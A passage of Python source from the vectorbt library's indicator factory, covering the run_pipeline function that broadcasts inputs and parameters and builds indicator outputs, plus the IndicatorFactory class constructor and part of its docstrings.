Input shape must be known beforehand.
pass_col (bool): Whether to pass column index as keyword argument if `per_column` is set to True.
keep_pd (bool): Whether to keep inputs as pandas objects, otherwise convert to NumPy arrays.
to_2d (bool): Whether to reshape inputs to 2-dim arrays, otherwise keep as-is.
as_lists (bool): Whether to pass inputs and parameters to `custom_func` as lists.
If `custom_func` is Numba-compiled, passes tuples.
pass_input_shape (bool): Whether to pass `input_shape` to `custom_func` as keyword argument.
pass_flex_2d (bool): Whether to pass `flex_2d` to `custom_func` as keyword argument.
level_names (list of str): A list of column level names corresponding to each parameter.
Should have the same length as `param_list`.
hide_levels (list): A list of indices of parameter levels to hide.
stacking_kwargs (dict): Keyword arguments passed to `vectorbt.base.index_fns.repeat_index`,
`vectorbt.base.index_fns.tile_index`, and `vectorbt.base.index_fns.stack_indexes`
when stacking parameter and input column levels.
return_raw (bool): Whether to return raw output without post-processing and hashed parameter tuples.
use_raw (bool): Takes the raw results and uses them instead of running `custom_func`.
wrapper_kwargs (dict): Keyword arguments passed to `vectorbt.base.array_wrapper.ArrayWrapper`.
seed (int): Set seed to make output deterministic.
**kwargs: Keyword arguments passed to the `custom_func`.
Some common arguments include `return_cache` to return cache and `use_cache` to use cache.
Those are only applicable to `custom_func` that supports it (`custom_func` created using
`IndicatorFactory.from_apply_func` are supported by default).
Returns:
Array wrapper, list of inputs (`np.ndarray`), input mapper (`np.ndarray`), list of outputs
(`np.ndarray`), list of parameter arrays (`np.ndarray`), list of parameter mappers (`np.ndarray`),
list of outputs that are outside of `num_ret_outputs`.
## Explanation
Here is a subset of tasks that the function `run_pipeline` does:
* Takes one or multiple array objects in `input_list` and broadcasts them.
```python-repl
>>> sr = pd.Series([1, 2], index=['x', 'y'])
>>> df = pd.DataFrame([[3, 4], [5, 6]], index=['x', 'y'], columns=['a', 'b'])
>>> input_list = vbt.base.reshape_fns.broadcast(sr, df)
>>> input_list[0]
a b
x 1 1
y 2 2
>>> input_list[1]
a b
x 3 4
y 5 6
```
* Takes one or multiple parameters in `param_list`, converts them to NumPy arrays and
broadcasts them.
```python-repl
>>> p1, p2, p3 = 1, [2, 3, 4], [False]
>>> param_list = vbt.base.reshape_fns.broadcast(p1, p2, p3)
>>> param_list[0]
array([1, 1, 1])
>>> param_list[1]
array([2, 3, 4])
>>> param_list[2]
array([False, False, False])
```
* Performs calculation using `custom_func` to build output arrays (`output_list`) and
other objects (`other_list`, optionally).
```python-repl
>>> def custom_func(ts1, ts2, p1, p2, p3, *args, **kwargs):
... return np.hstack((
... ts1 + ts2 + p1[0] * p2[0],
... ts1 + ts2 + p1[1] * p2[1],
... ts1 + ts2 + p1[2] * p2[2],
... ))
>>> output = custom_func(*input_list, *param_list)
>>> output
array([[ 6, 7, 7, 8, 8, 9],
[ 9, 10, 10, 11, 11, 12]])
```
* Creates new column hierarchy based on parameters and level names.
```python-repl
>>> p1_columns = pd.Index(param_list[0], name='p1')
>>> p2_columns = pd.Index(param_list[1], name='p2')
>>> p3_columns = pd.Index(param_list[2], name='p3')
>>> p_columns = vbt.base.index_fns.stack_indexes([p1_columns, p2_columns, p3_columns])
>>> new_columns = vbt.base.index_fns.combine_indexes([p_columns, input_list[0].columns])
>>> output_df = pd.DataFrame(output, columns=new_columns)
>>> output_df
p1 1
p2 2 3 4
p3 False False False False False False
a b a b a b
0 6 7 7 8 8 9
1 9 10 10 11 11 12
```
* Broadcasts objects in `input_list` to match the shape of objects in `output_list` through tiling.
This is done to be able to compare them and generate signals, since we cannot compare NumPy
arrays that have totally different shapes, such as (2, 2) and (2, 6).
```python-repl
>>> new_input_list = [
... input_list[0].vbt.tile(len(param_list[0]), keys=p_columns),
... input_list[1].vbt.tile(len(param_list[0]), keys=p_columns)
... ]
>>> new_input_list[0]
p1 1
p2 2 3 4
p3 False False False False False False
a b a b a b
0 1 1 1 1 1 1
1 2 2 2 2 2 2
```
* Builds parameter mappers that will link parameters from `param_list` to columns in
`input_list` and `output_list`. This is done to enable column indexing using parameter values.
"""
if require_input_shape:
checks.assert_not_none(input_shape)
pass_input_shape = True
if input_list is None:
input_list = []
if in_output_list is None:
in_output_list = []
if in_output_settings is None:
in_output_settings = {}
in_output_settings_keys = ['dtype']
if isinstance(in_output_settings, dict):
checks.assert_dict_valid(in_output_settings, [in_output_settings_keys])
else:
for _in_output_settings in in_output_settings:
checks.assert_dict_valid(_in_output_settings, [in_output_settings_keys])
if broadcast_kwargs is None:
broadcast_kwargs = {}
if param_list is None:
param_list = []
if param_settings is None:
param_settings = {}
param_settings_keys = [
'dtype',
'is_tuple',
'is_array_like',
'bc_to_input',
'broadcast_kwargs',
'per_column'
]
if isinstance(param_settings, dict):
checks.assert_dict_valid(param_settings, [param_settings_keys])
else:
for _param_settings in param_settings:
checks.assert_dict_valid(_param_settings, [param_settings_keys])
if hide_levels is None:
hide_levels = []
if stacking_kwargs is None:
stacking_kwargs = {}
if wrapper_kwargs is None:
wrapper_kwargs = {}
if keep_pd and checks.is_numba_func(custom_func):
raise ValueError("Cannot pass pandas objects to a Numba-compiled custom_func. Set keep_pd to False.")
in_output_idxs = [i for i, x in enumerate(in_output_list) if x is not None]
if len(in_output_idxs) > 0:
# In-place outputs should broadcast together with inputs
input_list += [in_output_list[i] for i in in_output_idxs]
if len(input_list) > 0:
# Broadcast inputs
if input_index is None:
input_index = 'default'
if input_columns is None:
input_columns = 'default'
# If input_shape is provided, will broadcast all inputs to this shape
broadcast_kwargs = merge_dicts(dict(
to_shape=input_shape,
index_from=input_index,
columns_from=input_columns
), broadcast_kwargs)
bc_input_list, input_shape, input_index, input_columns = reshape_fns.broadcast(
*input_list,
return_meta=True,
**broadcast_kwargs
)
if len(input_list) == 1:
bc_input_list = (bc_input_list,)
input_list = list(map(np.asarray, bc_input_list))
bc_in_output_list = []
if len(in_output_idxs) > 0:
# Separate inputs and in-place outputs
bc_in_output_list = input_list[-len(in_output_idxs):]
input_list = input_list[:-len(in_output_idxs)]
# Reshape input shape
if input_shape is not None and not isinstance(input_shape, tuple):
input_shape = (input_shape,)
# Keep original input_shape for per_column=True
orig_input_shape = input_shape
orig_input_shape_2d = input_shape
if input_shape is not None:
orig_input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1)
if per_column:
# input_shape is now the size of one column
if input_shape is None:
raise ValueError("input_shape is required when per_column=True")
input_shape = (input_shape[0],)
input_shape_ready = input_shape
input_shape_2d = input_shape
if input_shape is not None:
input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1)
if to_2d:
if input_shape is not None:
input_shape_ready = input_shape_2d # ready for custom_func
# Prepare parameters
# NOTE: input_shape instead of input_shape_ready since parameters should
# broadcast by the same rules as inputs
param_list = prepare_params(param_list, param_settings, input_shape=input_shape, to_2d=to_2d)
if len(param_list) > 1:
# Check level names
checks.assert_type(level_names, (list, tuple))
checks.assert_len_equal(param_list, level_names)
# Columns should be free of the specified level names
if input_columns is not None:
for level_name in level_names:
if level_name is not None:
checks.assert_level_not_exists(input_columns, level_name)
if param_product:
# Make Cartesian product out of all params
param_list = create_param_product(param_list)
if len(param_list) > 0:
# Broadcast such that each array has the same length
if per_column:
# The number of parameters should match the number of columns before split
param_list = broadcast_params(param_list, to_n=orig_input_shape_2d[1])
else:
param_list = broadcast_params(param_list)
n_param_values = len(param_list[0]) if len(param_list) > 0 else 1
use_speedup = False
param_list_unique = param_list
if not per_column and speedup:
try:
# Try to get all unique parameter combinations
param_tuples = list(zip(*param_list))
unique_param_tuples = list(OrderedDict.fromkeys(param_tuples).keys())
if len(unique_param_tuples) < len(param_tuples):
param_list_unique = list(map(list, zip(*unique_param_tuples)))
use_speedup = True
except:
pass
if checks.is_numba_func(custom_func):
# Numba can't stand untyped lists
param_list_ready = [to_typed_list(params) for params in param_list_unique]
else:
param_list_ready = param_list_unique
n_unique_param_values = len(param_list_unique[0]) if len(param_list_unique) > 0 else 1
# Prepare inputs
if per_column:
# Split each input into Series/1-dim arrays, one per column
input_list_ready = []
for input in input_list:
input_2d = reshape_fns.to_2d(input)
col_inputs = []
for i in range(input_2d.shape[1]):
if to_2d:
col_input = input_2d[:, [i]]
else:
col_input = input_2d[:, i]
if keep_pd:
# Keep as pandas object
col_input = ArrayWrapper(input_index, input_columns[[i]], col_input.ndim).wrap(col_input)
col_inputs.append(col_input)
input_list_ready.append(col_inputs)
else:
input_list_ready = []
for input in input_list:
new_input = input
if to_2d:
new_input = reshape_fns.to_2d(input)
if keep_pd:
# Keep as pandas object
new_input = ArrayWrapper(input_index, input_columns, new_input.ndim).wrap(new_input)
input_list_ready.append(new_input)
# Prepare in-place outputs
in_output_list_ready = []
j = 0
for i in range(len(in_output_list)):
if input_shape_2d is None:
raise ValueError("input_shape is required when using in-place outputs")
if i in in_output_idxs:
# This in-place output has been already broadcast with inputs
in_output_wide = np.require(bc_in_output_list[j], requirements='W')
if not per_column:
# One per parameter combination
in_output_wide = reshape_fns.tile(in_output_wide, n_unique_param_values, axis=1)
j += 1
else:
# This in-place output hasn't been provided, so create empty
_in_output_settings = in_output_settings if isinstance(in_output_settings, dict) else in_output_settings[i]
dtype = _in_output_settings.get('dtype', None)
in_output_shape = (input_shape_2d[0], input_shape_2d[1] * n_unique_param_values)
in_output_wide = np.empty(in_output_shape, dtype=dtype)
in_output_list[i] = in_output_wide
in_outputs = []
# Split each in-place output into chunks, each of input shape, and append to a list
for i in range(n_unique_param_values):
in_output = in_output_wide[:, i * input_shape_2d[1]: (i + 1) * input_shape_2d[1]]
if len(input_shape_ready) == 1:
in_output = in_output[:, 0]
if keep_pd:
if per_column:
in_output = ArrayWrapper(input_index, input_columns[[i]], in_output.ndim).wrap(in_output)
else:
in_output = ArrayWrapper(input_index, input_columns, in_output.ndim).wrap(in_output)
in_outputs.append(in_output)
in_output_list_ready.append(in_outputs)
if checks.is_numba_func(custom_func):
# Numba can't stand untyped lists
in_output_list_ready = [to_typed_list(in_outputs) for in_outputs in in_output_list_ready]
def _use_raw(_raw):
# Use raw results of previous run to build outputs
_output_list, _param_map, _n_input_cols, _other_list = _raw
idxs = np.array([_param_map.index(param_tuple) for param_tuple in zip(*param_list)])
_output_list = [
np.hstack([o[:, idx * _n_input_cols:(idx + 1) * _n_input_cols] for idx in idxs])
for o in _output_list
]
return _output_list, _param_map, _n_input_cols, _other_list
# Get raw results
if use_raw is not None:
# Use raw results of previous run to build outputs
output_list, param_map, n_input_cols, other_list = _use_raw(use_raw)
else:
# Prepare other arguments
func_args = args
func_kwargs = {}
if pass_input_shape:
func_kwargs['input_shape'] = input_shape_ready
if pass_flex_2d:
if input_shape is None:
raise ValueError("Cannot determine flex_2d without inputs")
func_kwargs['flex_2d'] = len(input_shape) == 2
func_kwargs = merge_dicts(func_kwargs, kwargs)
# Set seed
if seed is not None:
set_seed(seed)
def _call_custom_func(_input_list_ready, _in_output_list_ready, _param_list_ready, *_func_args, **_func_kwargs):
# Run the function
if as_lists:
if checks.is_numba_func(custom_func):
return custom_func(
tuple(_input_list_ready),
tuple(_in_output_list_ready),
tuple(_param_list_ready),
*_func_args, **_func_kwargs
)
return custom_func(
_input_list_ready,
_in_output_list_ready,
_param_list_ready,
*_func_args, **_func_kwargs
)
return custom_func(
*_input_list_ready,
*_in_output_list_ready,
*_param_list_ready,
*_func_args, **_func_kwargs
)
if per_column:
output = []
for col in range(orig_input_shape_2d[1]):
# Select the column of each input and in-place output, and the respective parameter combination
_input_list_ready = []
for _inputs in input_list_ready:
# Each input array is now one column wide
_input_list_ready.append(_inputs[col])
_in_output_list_ready = []
for _in_outputs in in_output_list_ready:
# Each in-output array is now one column wide
if isinstance(_in_outputs, List):
__in_outputs = List()
else:
__in_outputs = []
__in_outputs.append(_in_outputs[col])
_in_output_list_ready.append(__in_outputs)
_param_list_ready = []
for _params in param_list_ready:
# Each parameter list is now one element long
if isinstance(_params, List):
__params = List()
else:
__params = []
__params.append(_params[col])
_param_list_ready.append(__params)
_func_args = func_args
_func_kwargs = func_kwargs.copy()
if 'use_cache' in func_kwargs:
use_cache = func_kwargs['use_cache']
if isinstance(use_cache, list) and len(use_cache) == orig_input_shape_2d[1]:
# Pass cache for this column
_func_kwargs['use_cache'] = func_kwargs['use_cache'][col]
if pass_col:
_func_kwargs['col'] = col
col_output = _call_custom_func(
_input_list_ready,
_in_output_list_ready,
_param_list_ready,
*_func_args,
**_func_kwargs
)
output.append(col_output)
else:
output = _call_custom_func(
input_list_ready,
in_output_list_ready,
param_list_ready,
*func_args,
**func_kwargs
)
# Return cache
if kwargs.get('return_cache', False):
if use_speedup and not silence_warnings:
warnings.warn("Cache is produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
return output
def _split_output(output):
# Post-process results
if output is None:
_output_list = []
_other_list = []
else:
if isinstance(output, (tuple, list, List)):
_output_list = list(output)
else:
_output_list = [output]
# Other outputs should be returned without post-processing (for example cache_dict)
if len(_output_list) > num_ret_outputs:
_other_list = _output_list[num_ret_outputs:]
if use_speedup and not silence_warnings:
warnings.warn("Additional output objects are produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
else:
_other_list = []
# Process only the num_ret_outputs outputs
_output_list = _output_list[:num_ret_outputs]
if len(_output_list) != num_ret_outputs:
raise ValueError("Number of returned outputs other than expected")
_output_list = list(map(lambda x: reshape_fns.to_2d(x, raw=True), _output_list))
return _output_list, _other_list
if per_column:
output_list = []
other_list = []
for _output in output:
__output_list, __other_list = _split_output(_output)
output_list.append(__output_list)
if len(__other_list) > 0:
other_list.append(__other_list)
# Concatenate each output (must be one column wide)
output_list = [np.hstack(input_group) for input_group in zip(*output_list)]
else:
output_list, other_list = _split_output(output)
# In-place outputs are treated as outputs from here
output_list = in_output_list + output_list
# Prepare raw
param_map = list(zip(*param_list_unique)) # account for use_speedup
output_shape = output_list[0].shape
for output in output_list:
if output.shape != output_shape:
raise ValueError("All outputs must have the same shape")
if per_column:
n_input_cols = 1
else:
n_input_cols = output_shape[1] // n_unique_param_values
if input_shape_2d is not None:
if n_input_cols != input_shape_2d[1]:
if per_column:
raise ValueError("All outputs must have one column when per_column=True")
else:
raise ValueError("All outputs must have the number of columns = #input columns x #parameters")
raw = output_list, param_map, n_input_cols, other_list
if return_raw:
if use_speedup and not silence_warnings:
warnings.warn("Raw output is produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
return raw
if use_speedup:
output_list, param_map, n_input_cols, other_list = _use_raw(raw)
# Update shape and other meta if no inputs
if input_shape is None:
if n_input_cols == 1:
input_shape = (output_list[0].shape[0],)
else:
input_shape = (output_list[0].shape[0], n_input_cols)
else:
input_shape = orig_input_shape
if input_index is None:
input_index = pd.RangeIndex(start=0, step=1, stop=input_shape[0])
if input_columns is None:
input_columns = pd.RangeIndex(start=0, step=1, stop=input_shape[1] if len(input_shape) > 1 else 1)
# Build column hierarchy and create mappers
if len(param_list) > 0:
# Build new column levels on top of input levels
param_indexes, new_columns = build_columns(
param_list,
input_columns,
level_names=level_names,
hide_levels=hide_levels,
param_settings=param_settings,
per_column=per_column,
**stacking_kwargs
)
# Build a mapper that maps old columns in inputs to new columns
# Instead of tiling all inputs to the shape of outputs and wasting memory,
# we just keep a mapper and perform the tiling when needed
input_mapper = None
if len(input_list) > 0:
if per_column:
input_mapper = np.arange(len(input_columns))
else:
input_mapper = np.tile(np.arange(len(input_columns)), n_param_values)
# Build mappers to easily map between parameters and columns
mapper_list = [param_indexes[i] for i in range(len(param_list))]
else:
# Some indicators don't have any params
new_columns = input_columns
input_mapper = None
mapper_list = []
# Return artifacts: no pandas objects, just a wrapper and NumPy arrays
new_ndim = len(input_shape) if output_list[0].shape[1] == 1 else output_list[0].ndim
wrapper = ArrayWrapper(input_index, new_columns, new_ndim, **wrapper_kwargs)
return wrapper, \
input_list, \
input_mapper, \
output_list[:len(in_output_list)], \
output_list[len(in_output_list):], \
param_list, \
mapper_list, \
other_list
def perform_init_checks(wrapper, input_list, input_mapper, in_output_list, output_list,
param_list, mapper_list, short_name, level_names):
"""Perform checks on objects created by running or slicing an indicator."""
if input_mapper is not None:
checks.assert_equal(input_mapper.shape[0], wrapper.shape_2d[1])
for ts in input_list:
checks.assert_equal(ts.shape[0], wrapper.shape_2d[0])
for ts in in_output_list + output_list:
checks.assert_equal(ts.shape, wrapper.shape_2d)
for params in param_list:
checks.assert_len_equal(param_list[0], params)
for mapper in mapper_list:
checks.assert_equal(len(mapper), wrapper.shape_2d[1])
checks.assert_type(short_name, str)
checks.assert_len_equal(level_names, param_list)
def combine_objs(obj, other, *args, level_name=None, keys=None, **kwargs):
"""Combines/compares `obj` to `other`, for example, to generate signals.
Both will be broadcast together.
Pass `other` as a tuple or a list to compare with multiple arguments.
In this case, a new column level will be created with the name `level_name`.
See `vectorbt.base.accessors.BaseAccessor.combine`."""
if isinstance(other, (tuple, list)):
if keys is None:
keys = index_fns.index_from_values(other, name=level_name)
return obj.vbt.combine(other, *args, keys=keys, concat=True, **kwargs)
def f(*args):
return type(*args)
class IndicatorFactory:
def __init__(self,
class_name='Indicator',
class_docstring='',
module_name=__name__,
short_name=None,
prepend_name=True,
input_names=None,
param_names=None,
in_output_names=None,
output_names=None,
output_flags=None,
custom_output_props=None,
attr_settings=None):
"""A factory for creating new indicators.
Initialize `IndicatorFactory` to create a skeleton and then use a class method
such as `IndicatorFactory.from_custom_func` to bind a calculation function to the skeleton.
Args:
class_name (str): Name for the created indicator class.
class_docstring (str): Docstring for the created indicator class.
module_name (str): Specify the module the class originates from.
short_name (str): A short name of the indicator.
Defaults to lower-case `class_name`.
prepend_name (bool): Whether to prepend `short_name` to each parameter level.
input_names (list of str): A list of names of input arrays.
param_names (list of str): A list of names of parameters.
in_output_names (list of str): A list of names of in-place output arrays.
An in-place output is an output that is not returned but modified in-place.
Some advantages of such outputs include:
1) they don't need to be returned,
2) they can be passed between functions as easily as inputs,
3) they can be provided with already allocated data to safe memory,
4) if data or default value are not provided, they are created empty to not occupy memory.
output_names (list of str): A list of names of output arrays.
output_flags (dict): A dictionary of in-place and regular output flags.
custom_output_props (dict): A dictionary with user-defined functions that will be
bound to the indicator class and (if not a property) wrapped with `@cached_property`.
attr_settings (dict): A dictionary of settings by attribute name.
Attributes can be `input_names`, `in_output_names`, `output_names` and `custom_output_props`.
Following keys are accepted:
* `dtype`: Data type used to determine which methods to generate around this attribute.
Set to None to disable. Default is `np.float_`. Can be set to instance of
`collections.namedtuple` acting as enumerated type; it will then create a property
with suffix `readable` that contains data in a string format.
!!! note
The `__init__` method is not used for running the indicator, for this use `run`.
The reason for this is indexing, which requires a clean `__init__` method for creating
a new indicator object with newly indexed attributes.
"""
# Check and save parameters
self.class_name = class_name
checks.assert_type(class_name, str)
self.class_docstring = class_docstring
checks.assert_type(class_docstring, str)
self.module_name = module_name
if module_name is not None:
checks.assert_type(module_name, str)
if short_name is None:
if class_name == 'Indicator':
short_name = 'custom'
else:
short_name = class_name.lower()
self.short_name = short_name
checks.assert_type(short_name, str)
self.prepend_name = prepend_name
checks.assert_type(prepend_name, bool)
if input_names is None:
input_names = []
checks.assert_type(input_names, (tuple, list))
self.input_names = input_names
if param_names is None:
param_names = []
checks.assert_type(param_names, (tuple, list))
self.param_names = param_names
if in_output_names is None:
in_output_names = []
checks.assert_type(in_output_names, (tuple, list))
self.in_output_names = in_output_names
if output_names is None:
output_names = []
checks.assert_type(output_names, (tuple, list))
self.output_names = output_names
all_output_names = in_output_names + output_names
if len(all_output_names) == 0:
raise ValueError("Must have at least one in-place or regular output")
if output_flags is None:
output_flags = {}
checks.assert_type(output_flags, dict)
if len(output_flags) > 0:
checks.assert_dict_valid(output_flags, [all_output_names])
self.output_flags = output_flags
if custom_output_props is None:
custom_output_props = {}
checks.assert_type(custom_output_props, dict)
self.custom_output_props = custom_output_props
if attr_settings is None:
attr_settings = {}
checks.assert_type(attr_settings, dict)
all_attr_names = input_names + all_output_names + list(custom_output_props.keys())
if len(attr_settings) > 0:
checks.assert_dict_valid(attr_settings, [all_attr_names])
self.attr_settings = attr_settings
# Set up class
ParamIndexer = ParamIndexerFactory(
param_names + (['tuple'] if len(param_names) > 1 else []),
module_name=module_name
)
Indicator = type(self.class_name, (Wrapping, ParamIndexer), {})
Indicator.__doc__ = self.class_docstring
if module_name is not None:
Indicator.__module__ = self.module_name
# Add indexing methods
def _indexing_func(obj, pd_indexing_func, **kwargs):
new_wrapper, idx_idxs, _, col_idxs = obj.wrapper._indexing_func_meta(pd_indexing_func, **kwargs)
idx_idxs_arr = reshape_fns.to_1d(idx_idxs, raw=True)
col_idxs_arr = reshape_fns.to_1d(col_idxs, raw=True)
if np.array_equal(idx_idxs_arr, np.arange(obj.wrapper.shape_2d[0])):
idx_idxs_arr = slice(None, None, None)
if np.array_equal(col_idxs_arr, np.arange(obj.wrapper.shape_2d[1])):
col_idxs_arr = slice(None, None, None)
input_mapper = getattr(obj, '_input_mapper', None)
if input_mapper is not None:
input_mapper = input_mapper[col_idxs_arr]
input_list = []
for input_name in input_names:
input_list.append(getattr(obj, f'_{input_name}')[idx_idxs_arr])
in_output_list = []
for in_output_name in in_output_names:
in_output_list.append(getattr(obj, f'_{in_output_name}')[idx_idxs_arr, :][:, col_idxs_arr])
output_list = []
for output_name in output_names:
output_list.append(getattr(obj, f'_{output_name}')[idx_idxs_arr, :][:, col_idxs_arr])
param_list = []
for param_name in param_names:
param_list.append(getattr(obj, f'_{param_name}_array'))
mapper_list = []
for param_name in param_names:
# Tuple mapper is a list because of its complex data type
mapper_list.append(getattr(obj, f'_{param_name}_mapper')[col_idxs_arr])
return obj.copy(
wrapper=new_wrapper,
input_list=input_list,
input_mapper=input_mapper,
in_output_list=in_output_list,
output_list=output_list,
param_list=param_list,
mapper_list=mapper_list
)
setattr(Indicator, '_indexing_func', _indexing_func)
# Create read-only properties
prop = property(lambda _self: _self._short_name)
prop.__doc__ = "Name of the indicator."
setattr(Indicator, 'short_name', prop)
prop = property(lambda _self: _self._level_names)
prop.__doc__ = "Column level names corresponding to each parameter."
setattr(Indicator, 'level_names', prop)
prop = classproperty(lambda _self: input_names)
prop.__doc__ = "Names of the input arrays."
setattr(Indicator, 'input_names', prop)
prop = classproperty(lambda _self: param_names)
prop.__doc__ = "Names of the parameters."
setattr(Indicator, 'param_names', prop)
prop = classproperty(lambda _self: in_output_names)
prop.__doc__ = "Names of the in-place output arrays."
setattr(Indicator, 'in_output_names', prop)
prop = classproperty(lambda _self: output_names)
prop.__doc__ = "Names of the regular output arrays."
setattr(Indicator, 'output_names', prop)
prop = classproperty(lambda _self: output_flags)
prop.__doc__ = "Dictionary of output flags."
setattr(Indicator, 'output_flags', prop)
for param_name in param_names:
prop = property(lambda _self, param_name=param_name: getattr(_self, f'_{param_name}_array'))
prop.__doc__ = f"Array of `{param_name}` combinations."
setattr(Indicator, f'{param_name}_array', prop)
for input_name in input_names:
def input_prop(_self, input_name=input_name):
"""Input array."""
old_input = reshape_fns.to_2d(getattr(_self, '_' + input_name), raw=True)
input_mapper = getattr(_self, '_input_mapper')
if input_mapper is None:
return _self.wrapper.wrap(old_input)
return _self.wrapper.wrap(old_input[:, input_mapper])
input_prop.__name__ = input_name
setattr(Indicator, input_name, cached_property(input_prop))
for output_name in all_output_names:
def output_prop(_self, _output_name=output_name):
return _self.wrapper.wrap(getattr(_self, '_' + _output_name))
if output_name in in_output_names:
output_prop.__doc__ = """In-place output array."""
else:
output_prop.__doc__ = """Output array."""
output_prop.__name__ = output_name
if output_name in output_flags:
_output_flags = output_flags[output_name]
if isinstance(_output_flags, (tuple, list)):
_output_flags = ', '.join(_output_flags)
output_prop.__doc__ += "\n\n" + _output_flags
setattr(Indicator, output_name, property(output_prop))
# Add __init__ method
def __init__(_self, wrapper, input_list, input_mapper, in_output_list, output_list,
param_list, mapper_list, short_name, level_names):
perform_init_checks(
wrapper,
input_list,
input_mapper,
in_output_list,
output_list,
param_list,
mapper_list,
short_name,
level_names
)
Wrapping.__init__(
_self,
wrapper,
input_list=input_list,
input_mapper=input_mapper,
in_output_list=in_output_list,
output_list=output_list,
param_list=param_list,
mapper_list=mapper_list,
short_name=short_name,
level_names=level_names
)
for i, ts_name in enumerate(input_names):
setattr(_self, f'_{ts_name}', input_list[i])
setattr(_self, '_input_mapper', input_mapper)
for i, in_output_name in enumerate(in_output_names):
setattr(_self, f'_{in_output_name}', in_output_list[i])
for i, output_name in enumerate(output_names):
setattr(_self, f'_{output_name}', output_list[i])
for i, param_name in enumerate(param_names):
setattr(_self, f'_{param_name}_array', param_list[i])
setattr(_self, f'_{param_name}_mapper', mapper_list[i])
if len(param_names) > 1:
tuple_mapper = list(zip(*list(mapper_list)))
setattr(_self, '_tuple_mapper', tuple_mapper)
else:
tuple_mapper = None
setattr(_self, '_short_name', short_name)
setattr(_self, '_level_names', level_names)
# Initialize indexers
mapper_sr_list = []
for i, m in enumerate(mapper_list):
mapper_sr_list.append(pd.Series(m, index=wrapper.columns))
if tuple_mapper is not None:
mapper_sr_list.append(pd.Series(tuple_mapper, index=wrapper.columns))
ParamIndexer.__init__(
_self, mapper_sr_list,
level_names=[*level_names, tuple(level_names)]
)
setattr(Indicator, '__init__', __init__)
# Add user-defined outputs
for prop_name, prop in custom_output_props.items():
if prop.__doc__ is None:
prop.__doc__ = f"""Custom property."""
if not isinstance(prop, (property, cached_property)):
prop.__name__ = prop_name
prop = cached_property(prop)
setattr(Indicator, prop_name, prop)
# Add comparison & combination methods for all inputs, outputs, and user-defined properties
for attr_name in all_attr_names:
_attr_settings = attr_settings.get(attr_name, {})
checks.assert_dict_valid(_attr_settings, [['dtype']])
dtype = _attr_settings.get('dtype', np.float_)
if checks.is_namedtuple(dtype):
def attr_readable(_self, attr_name=attr_name, enum=dtype):
if _self.wrapper.ndim == 1:
return getattr(_self, attr_name).map(lambda x: '' if x == -1 else enum._fields[x])
return getattr(_self, attr_name).applymap(lambda x: '' if x == -1 else enum._fields[x])
attr_readable.__qualname__ = f'{Indicator.__name__}.{attr_name}_readable'
attr_readable.__doc__ = f"""{attr_name} in readable format based on enum {dtype}."""
setattr(Indicator, f'{attr_name}_readable', property(attr_readable))
elif np.issubdtype(dtype, np.number):
def assign_numeric_method(func_name, combine_func, attr_name=attr_name):
def numeric_method(_self, other, crossover=False, wait=0, after_false=True,
level_name=None, prepend_name=prepend_name, **kwargs):
if isinstance(other, _self.__class__):
other = getattr(other, attr_name)
if level_name is None:
if prepend_name:
if attr_name == _self.short_name:
level_name = f'{_self.short_name}_{func_name}'
else:
level_name = f'{_self.short_name}_{attr_name}_{func_name}'
else:
level_name = f'{attr_name}_{func_name}'
out = combine_objs(
getattr(_self, attr_name),
other,
combine_func=combine_func,
level_name=level_name,
**kwargs
)
if crossover:
return out.vbt.signals.nst(wait + 1, after_false=after_false)
return out
numeric_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}'
numeric_method.__doc__ = f"""Return True for each element where `{attr_name}` is {func_name} `other`.
Set `crossover` to True to return the first True after crossover. Specify `wait` to return
True only when `{attr_name}` is {func_name} for a number of time steps in a row after crossover.
See `vectorbt.indicators.factory.combine_objs`."""
setattr(Indicator, f'{attr_name}_{func_name}', numeric_method)
assign_numeric_method('above', np.greater)
assign_numeric_method('below', np.less)
assign_numeric_method('equal', np.equal)
elif np.issubdtype(dtype, np.bool_):
def assign_bool_method(func_name, combine_func, attr_name=attr_name):
def bool_method(_self, other, level_name=None, prepend_name=prepend_name, **kwargs):
if isinstance(other, _self.__class__):
other = getattr(other, attr_name)
if level_name is None:
if prepend_name:
if attr_name == _self.short_name:
level_name = f'{_self.short_name}_{func_name}'
else:
level_name = f'{_self.short_name}_{attr_name}_{func_name}'
else:
level_name = f'{attr_name}_{func_name}'
return combine_objs(
getattr(_self, attr_name),
other,
combine_func=combine_func,
level_name=level_name,
**kwargs
)
bool_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}'
bool_method.__doc__ = f"""Return `{attr_name} {func_name.upper()} other`.
See `vectorbt.indicators.factory.combine_objs`."""
setattr(Indicator, f'{attr_name}_{func_name}', bool_method)
assign_bool_method('and', np.logical_and)
assign_bool_method('or', np.logical_or)
assign_bool_method('xor', np.logical_xor)
self.Indicator = Indicator
def from_custom_func(self,
custom_func,
require_input_shape=False,
param_settings=None,
in_output_settings=None,
hide_params=None,
hide_default=True,
var_args=False,
keyword_only_args=False,
**pipeline_kwargs):
"""Build indicator class around a custom calculation function.
In contrast to `IndicatorFactory.from_apply_func`, this method offers full flexbility.
It's up to we to handle caching and concatenate columns for each parameter (for example,
by using `vectorbt.base.combine_fns.apply_and_concat_one`). Also, you should ensure that
each output array has an appropriate number of columns, which is the number of columns in
input arrays multiplied by the number of parameter combinations.
Args:
custom_func (callable): A function that takes broadcast arrays corresponding
to `input_names`, broadcast in-place output arrays corresponding to `in_output_names`,
broadcast parameter arrays corresponding to `param_names`, and other arguments and
keyword arguments, and returns outputs corresponding to `output_names` and other objects
that are then returned with the indicator instance.
Can be Numba-compiled.
!!! note
Shape of each output should be the same and match the shape of each input stacked
n times (= the number of parameter values) along the column axis.
require_input_shape (bool): Whether to input shape is required.
param_settings (dict): A dictionary of parameter settings keyed by name.
See `run_pipeline` for keys.
Can be overwritten by any run method.
in_output_settings (dict): A dictionary of in-place output settings keyed by name.
See `run_pipeline` for keys.
Can be overwritten by any run method.
hide_params (list): Parameter names to hide column levels for.
Can be overwritten by any run method.
hide_default (bool): Whether to hide column levels of parameters with default value.
Can be overwritten by any run method.
var_args (bool): Whether run methods should accept variable arguments (`*args`).
Set to True if `custom_func` accepts positional agruments that are not listed in the config.
keyword_only_args (bool): Whether run methods should accept keyword-only arguments (`*`).
Set to True to force the user to use keyword arguments (e.g., to avoid misplacing arguments).
